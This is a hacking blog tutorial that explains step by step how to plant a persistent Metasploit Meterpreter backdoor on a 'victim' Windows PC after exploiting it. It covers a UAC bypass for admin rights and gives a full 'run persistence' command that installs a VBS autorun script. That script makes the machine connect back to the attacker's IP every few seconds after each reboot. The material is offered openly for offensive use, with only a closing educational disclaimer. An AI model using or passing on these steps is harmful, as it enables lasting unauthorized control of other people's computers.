How To Make Persistent Backdoor After Exploit


Unfortunately, the Meterpreter ceases to work if the victim system is rebooted. As a result, many of you have written me asking whether we can maintain or persist the Meterpreter on the victim system.

The answer is "Yes!" ? How ?Lets know !

Persistent creates a backdoor which twice to connect back to the attacker metasploit instance and it would connect back to happen at system boot or user log on.

You can also configure the time between different connect back attempt in case the currently the attacker machine is not up and you want the backdoor to keep trying to connect you. Now how its work, under the hood Persistent creates a vbs script on the victim system and it to appropriate registry to autorun.


To get system level or admin privilege we have to execute it as admin which is monitored my windows UAC.

It assumes that you already have MetaSploit installed, or that you are running Kali / backtrack Linux. if not Installed,you can download from here https://www.metasploit.com/


Lets Start To Make Persistent Backdoor After Exploit

Step 1 : Firtly get a meterpreter of victim PC and a get a admim privilege of vitim pc using bypassuac


How To Bypass UAC And Get Admin Privilege in Windows Using MetaSploit.


Step 2 : We now have a full Meterpreter shell to the target.Now the session has opened type sysinfo to get system information


How To Change Wallpaper of Windows PC Remotely


Step 3 : Just Type help to see more action.


How To Make Persistent Backdoor After Exploit


Step 4 : Type Exit and Run the Persistence Script

Metasploit has a script named persistence that can enable us to set up a persistent Meterpreter (listener) on the victims system. First lets take a look at the options that are available when we run this script by using the –h switch

meterpreter > run persistence -h

How To Make Persistent Backdoor After Exploit


Step 5 : Type Command

meterpreter >run persistence -U -i 5 -p 4466 -r 192.168.18.132

This command then will run the persistence and checks every 5 seconds for a connection (-i 30), connects on port 4466 (-p 4466), and connects to the local system (ours) on IP address 192.168.18.132.


How To Make Persistent Backdoor After Exploit


The .vbs file sucessfully saved on victim PC.Opening a Second Session We can see that we have opened a Meterpreter session on the victim system.


How To Make Persistent Backdoor After Exploit


Step 6 : Now its time to check if the backdoor will open for us a new session every time that the system will boot. So we will reboot the system.

Windows is shutting down


How To Make Persistent Backdoor After Exploit


See all sessions automatically closed.


How To Make Persistent Backdoor After Exploit


Step 7 : Even after the system reboots, the Meterpreter on the victim system attempts to connect to us every 5 seconds until it has successfully open a session for us.


How To Make Persistent Backdoor After Exploit


Step 8 : Now we have successfully opened a persistent connection on the victim system that we can come back to time and time again.


How To Make Persistent Backdoor After Exploit


Step 9 : Now check open Sessions


How To Make Persistent Backdoor After Exploit


For References :-




I hope you enjoyed this article.



Sharing is caring

google
linkedin

About Author

Akash is a co-founder and an aspiring entrepreneur who keeps a close eye on open source, tech giants, and security. Get in touch with him by sending an email (akashchugh1994@gmail.com).


You may also like :-




Leave a Comment

Your email address will not be published. Required fields are marked *




Stay Connected

Popular Posts

Get Latest Stuff Through Email


Who Should Read TechTrick?

All the tricks and tips that TechTrick provides only for educational purpose. If you choose to use the information in TechTrick to break into computer systems maliciously and without authorization, you are on your own. Neither I (TechTrick Admin) nor anyone else associated with TechTrick shall be liable. We are not responsibe for any issues that caused due to informations provided here. So, Try yourself and see the results. You are not losing anything by trying... We are humans, Mistakes are quite natural. Here on TechTrick also have many mistakes..